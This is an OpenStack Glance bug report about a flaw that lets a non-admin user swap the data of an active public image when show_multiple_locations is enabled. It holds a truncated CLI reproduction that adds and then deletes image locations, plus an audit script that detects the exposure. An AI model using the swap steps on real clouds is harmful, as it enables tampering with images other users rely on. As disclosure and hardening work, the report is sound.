Normal user can replace active image data if show_multiple_locations has been set to true
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Glance | Confirmed | High | Unassigned |
OpenStack Security Advisory | Opinion | Undecided | Unassigned |
OpenStack Security Notes | Fix Released | Undecided | Robert Clark |
Bug Description
Some time ago there was a security bug https:/
Bug description:
A user (non-admin) can change image data by updating the location for an image when "show_multiple_
mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| id | 2a745d21-
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance location-add 2a745d21-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| file | /v2/images/
| id | 2a745d21-
| locations | [{"url": "https:/
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance image-download 2a745d21-
mfedosin@wdev:~$ cat ooo
I'm really good image.
mfedosin@wdev:~$ glance location-add 2a745d21-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| file | /v2/images/
| id | 2a745d21-
| locations | [{"url": "https:/
| | {}}, {"url": "https:/
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance location-delete 2a745d21-
mfedosin@wdev:~$ glance image-download 2a745d21-
mfedosin@wdev:~$ cat ooo
All your base are belong to us! Muahahaha!
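The swap in the transcript above works because locations on an active image can be added and deleted by the image owner while show_multiple_locations is on. The following audit script is an added example, not code from the bug report or from Glance: it reads a glance-api.conf and a policy.json and flags that combination. The sample config and policy contents are constructed; set_image_location and delete_image_location are Glance policy rule names, and restricting them to role:admin is the hardening assumed here, not a fix stated on this page.

```python
import configparser
import json

# Constructed sample glance-api.conf with the risky setting switched on.
WEAK_CONF = "[DEFAULT]\nshow_multiple_locations = True\n"

# Constructed sample policy.json: empty rules allow any authenticated user.
WEAK_POLICY = json.dumps({"default": "", "set_image_location": "",
                          "delete_image_location": ""})

# Constructed sample policy.json restricting location changes to admins.
SAFE_POLICY = json.dumps({"default": "", "set_image_location": "role:admin",
                          "delete_image_location": "role:admin"})

LOCATION_RULES = ("set_image_location", "delete_image_location")


def multiple_locations_enabled(conf_text):
    """True when show_multiple_locations is on in [DEFAULT] (default False)."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return cp.getboolean("DEFAULT", "show_multiple_locations", fallback=False)


def open_location_rules(policy_text):
    """Location rules that someone other than role:admin can satisfy.
    A rule absent from the file falls back to the "default" rule."""
    policy = json.loads(policy_text)
    default = policy.get("default", "")
    return [r for r in LOCATION_RULES if policy.get(r, default) != "role:admin"]


def audit(conf_text, policy_text):
    """Findings for the swap shown in the bug: add a second location to an
    active image, then delete the original. Empty list means not exposed."""
    if not multiple_locations_enabled(conf_text):
        return []
    open_rules = open_location_rules(policy_text)
    if not open_rules:
        return []
    return ["show_multiple_locations=True and non-admin users may call "
            + ", ".join(open_rules)]


if __name__ == "__main__":
    print(audit(WEAK_CONF, WEAK_POLICY))   # one finding
    print(audit(WEAK_CONF, SAFE_POLICY))   # []
```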
Changed in ossn: assignee: nobody → hyakuhei (hyakuhei)
Changed in ossn: assignee: Robert Clark (robert-clark) → Travis McPeak (travis-mcpeak)
Changed in ossn: assignee: Travis McPeak (travis-mcpeak) → Robert Clark (robert-clark)
description: updated
Changed in ossn: status: New → Fix Released
information type: Private Security → Public
tags: added: security
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.